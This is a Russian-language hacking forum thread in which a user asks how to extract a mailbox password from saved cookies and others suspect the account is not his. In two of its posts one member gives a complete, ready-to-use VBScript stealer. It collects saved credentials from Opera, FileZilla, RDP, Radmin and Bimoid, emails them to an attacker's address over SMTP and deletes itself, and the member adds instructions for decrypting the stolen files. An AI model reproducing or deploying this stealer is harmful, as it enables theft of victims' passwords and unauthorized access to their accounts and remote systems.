Пароль из куков

Discussion in 'Уязвимости Mail-сервисов' started by optimizet, 31 Dec 2011.

  1. optimizet

    optimizet New Member

    Joined:
    9 Aug 2010
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    НЕ знаю пароля от своего ящика.

    Захожу по сохраненным кукам.
    Браузер Firefox 4.0.1

    Как можно выдрать из куков пароль?

    Заранее благодарен за помощь! :)
     
  2. Lnk[~Q~]

    Lnk[~Q~] New Member

    Joined:
    27 Dec 2011
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    Куки, если их правильно исопльзуют, должны служить чемто вроде временного пароля. Так что ответ на ваш вопрос.

    Никак.
     
  3. ride

    ride New Member

    Joined:
    18 Apr 2010
    Messages:
    26
    Likes Received:
    4
    Reputations:
    0
    А вариант восстановить через секретный вопрос?
     
  4. Lnk[~Q~]

    Lnk[~Q~] New Member

    Joined:
    27 Dec 2011
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    Ну так не сказано куда именно заходят. Вопрос стоит как из куков вытащить.
     
  5. optimizet

    optimizet New Member

    Joined:
    9 Aug 2010
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    Придется брутить :)

    Спасибо за ответы!

    Всех с наступающим)))
     
  6. <Cyber-punk>

    <Cyber-punk> Smash the Stack

    Joined:
    1 Oct 2009
    Messages:
    658
    Likes Received:
    315
    Reputations:
    430
    javascript:alert(document.cookie) введи в урле и тебе выскочат твои куки!
     
    _________________________
  7. optimizet

    optimizet New Member

    Joined:
    9 Aug 2010
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    Нужно что бы выскочил пароль)))
     
  8. Atomikdddsss

    Atomikdddsss Banned

    Joined:
    8 Dec 2011
    Messages:
    210
    Likes Received:
    13
    Reputations:
    2
    on error resume next
    sender = "левое мыло типа [email protected]" Зарегай любое левое мыло
    pass = "пароль от левого мыла" Пароль от него
    smtp = "и smtp левого мыла smtp.rambler.ru"
    recv = "сюда своё мыло" а тут впиши своё мыло
    Set IE=CreateObject("InternetExplorer.Application")
    Set WinShell=CreateObject("WScript.Shell")
    Set iMsg = CreateObject("CDO.Message")
    Set iConf = CreateObject("CDO.Configuration")
    Set Flds = iConf.Fields
    Flds.Item("http://schemas.microsoft.com/cdo/configuration/sendusing")=2
    Flds.Item("http://schemas.microsoft.com/cdo/configuration/smtpauthenticate")=1
    Flds.Item("http://schemas.microsoft.com/cdo/configuration/sendusername")=sender
    Flds.Item("http://schemas.microsoft.com/cdo/configuration/sendpassword")=pass
    Flds.Item("http://schemas.microsoft.com/cdo/configuration/smtpserver")=smtp
    Flds.Item("http://schemas.microsoft.com/cdo/configuration/smtpserverport")=25
    Flds.Update
    iMsg.Configuration = iConf
    iMsg.To = recv
    iMsg.From = sender
    iMsg.Subject = WinShell.ExpandEnvironmentStrings("%computername%")
    iMsg.TextBody = "Computername: "&WinShell.ExpandEnvironmentStrings("%computername%") & " Username: "&WinShell.ExpandEnvironmentStrings("%username%")
    iMsg.AddAttachment WinShell.ExpandEnvironmentStrings("%appdata%")&"\Opera\Opera\wand.dat"
    iMsg.AddAttachment WinShell.ExpandEnvironmentStrings("%appdata%")&"\Opera\Opera\profile\wand.dat"
    iMsg.AddAttachment WinShell.ExpandEnvironmentStrings("%appdata%")&"\FileZilla\filezilla.xml"
    iMsg.AddAttachment WinShell.ExpandEnvironmentStrings("%USERPROFILE%")&"\Мои документы\Default.rdp"
    iMsg.AddAttachment WinShell.ExpandEnvironmentStrings("%appdata%")&"\Radmin\radmin.rpb"
    iMsg.AddAttachment WinShell.ExpandEnvironmentStrings("%USERPROFILE%")&"\Local Settings\Application Data\Bimoid\Users\User0001\ObimpUser.ini"
    iMsg.AddAttachment WinShell.ExpandEnvironmentStrings("%USERPROFILE%")&"\Local Settings\Application Data\Bimoid\Bimoid.ini"
    iMsg.Send
    fso.deletefile WScript.ScriptFullName, True

    ИЗМЕНЯЕШЬ ПОД СЕБЯ СОХРАНЯЕШЬ КАК .vbs Проверяешь своё мыло.Сохраняешь присланные файлы с твоего компа и расшифровываешь с помощью программы Multi_Password_Recovery_1.1.9_Portable.

    Вообще смотри готовый типо


    on error resume next
    sender = "[email protected]"
    pass = "zzzzzzzzz"
    smtp = "smtp.rambler.ru"
    recv = "[email protected]"
    Set IE=CreateObject("InternetExplorer.Application")
    Set WinShell=CreateObject("WScript.Shell")
    Set iMsg = CreateObject("CDO.Message")
    Set iConf = CreateObject("CDO.Configuration")
    Set Flds = iConf.Fields
    Flds.Item("http://schemas.microsoft.com/cdo/configuration/sendusing")=2
    Flds.Item("http://schemas.microsoft.com/cdo/configuration/smtpauthenticate")=1
    Flds.Item("http://schemas.microsoft.com/cdo/configuration/sendusername")=sender
    Flds.Item("http://schemas.microsoft.com/cdo/configuration/sendpassword")=pass
    Flds.Item("http://schemas.microsoft.com/cdo/configuration/smtpserver")=smtp
    Flds.Item("http://schemas.microsoft.com/cdo/configuration/smtpserverport")=25
    Flds.Update
    iMsg.Configuration = iConf
    iMsg.To = recv
    iMsg.From = sender
    iMsg.Subject = WinShell.ExpandEnvironmentStrings("%computername%")
    iMsg.TextBody = "Computername: "&WinShell.ExpandEnvironmentStrings("%computername%") & " Username: "&WinShell.ExpandEnvironmentStrings("%username%")
    iMsg.AddAttachment WinShell.ExpandEnvironmentStrings("%appdata%")&"\Opera\Opera\wand.dat"
    iMsg.AddAttachment WinShell.ExpandEnvironmentStrings("%appdata%")&"\Opera\Opera\profile\wand.dat"
    iMsg.AddAttachment WinShell.ExpandEnvironmentStrings("%appdata%")&"\FileZilla\filezilla.xml"
    iMsg.AddAttachment WinShell.ExpandEnvironmentStrings("%USERPROFILE%")&"\Мои документы\Default.rdp"
    iMsg.AddAttachment WinShell.ExpandEnvironmentStrings("%appdata%")&"\Radmin\radmin.rpb"
    iMsg.AddAttachment WinShell.ExpandEnvironmentStrings("%USERPROFILE%")&"\Local Settings\Application Data\Bimoid\Users\User0001\ObimpUser.ini"
    iMsg.AddAttachment WinShell.ExpandEnvironmentStrings("%USERPROFILE%")&"\Local Settings\Application Data\Bimoid\Bimoid.ini"
    iMsg.Send
    fso.deletefile WScript.ScriptFullName, True
     
    1 person likes this.
  9. nuk_sheva

    nuk_sheva New Member

    Joined:
    18 Dec 2011
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Multi_Password_Recovery_1.1.9_Portable не поддерживает формат rpb получается нужно radmin открывать?
     
  10. kastin

    kastin Elder - Старейшина

    Joined:
    6 Jul 2009
    Messages:
    528
    Likes Received:
    53
    Reputations:
    35
    Если пароль сохраненный, то его же можно посмотреть в настройках. :rolleyes:
     
  11. Atomikdddsss

    Atomikdddsss Banned

    Joined:
    8 Dec 2011
    Messages:
    210
    Likes Received:
    13
    Reputations:
    2
    Или легче запусти Multi_Password_Recovery_1.1.9_Portable и проведи аудит паролей всё всплывёт.)))
     
  12. Atomikdddsss

    Atomikdddsss Banned

    Joined:
    8 Dec 2011
    Messages:
    210
    Likes Received:
    13
    Reputations:
    2
    Причём тут радмин, чувак ты не в теме.
     
  13. masych

    masych Member

    Joined:
    28 Jun 2010
    Messages:
    28
    Likes Received:
    16
    Reputations:
    2
    Multi Password Recovery 1.2.8 + Portable (2011)

    http://ivntech.ru/4081-multi-password-recovery-128-portable-2011-multirus.html
     
  14. M_script

    M_script Members of Antichat

    Joined:
    4 Nov 2004
    Messages:
    2,581
    Likes Received:
    1,317
    Reputations:
    1,557
    Ты предлагаешь локальные файлы со своего компа отправить на мыло, чтобы потом их скачать обратно себе на комп?
     
  15. altblitz

    altblitz Elder - Старейшина

    Joined:
    5 Jun 2009
    Messages:
    3,691
    Likes Received:
    3,145
    Reputations:
    236
    в плюшках сохраняется временная идентификация на одну сессию, в большинстве хороших годных веб-мейл сервисов.

    >>НЕ знаю пароля от своего ящика.
    >>Захожу по сохраненным кукам.


    заходишь на чужой мейл - признавайся!
    потому и не стану раскрывать, как сделать ретрив пасса мейла.
     
  16. optimizet

    optimizet New Member

    Joined:
    9 Aug 2010
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    Признаюсь :) Помогаю своему другу, поэтому можешь помочь, если не в тягость :)
     
  17. Unix@

    Unix@ New Member

    Joined:
    25 Sep 2011
    Messages:
    0
    Likes Received:
    3
    Reputations:
    6
    Если я не ошибаюсь,куки эти из почты,дак в чём проблема нужно всего лишь знать смену пароля в сессии на данном почтовом сервисе.
    Напиши в ЛС или ICQ помогу.
     
  18. Atomikdddsss

    Atomikdddsss Banned

    Joined:
    8 Dec 2011
    Messages:
    210
    Likes Received:
    13
    Reputations:
    2
    Ну а понятно же было ,что пассы то он не у себя тырит :D
     
    #18 Atomikdddsss, 5 Jan 2012
    Last edited: 5 Jan 2012
    1 person likes this.
  19. C00LPack

    C00LPack Elder - Старейшина

    Joined:
    7 Oct 2010
    Messages:
    425
    Likes Received:
    72
    Reputations:
    19
    а теперь, хлопчик, укажи автора.
     
  20. Atomikdddsss

    Atomikdddsss Banned

    Joined:
    8 Dec 2011
    Messages:
    210
    Likes Received:
    13
    Reputations:
    2
    Извени конечно АВТОР "COOL_Pack"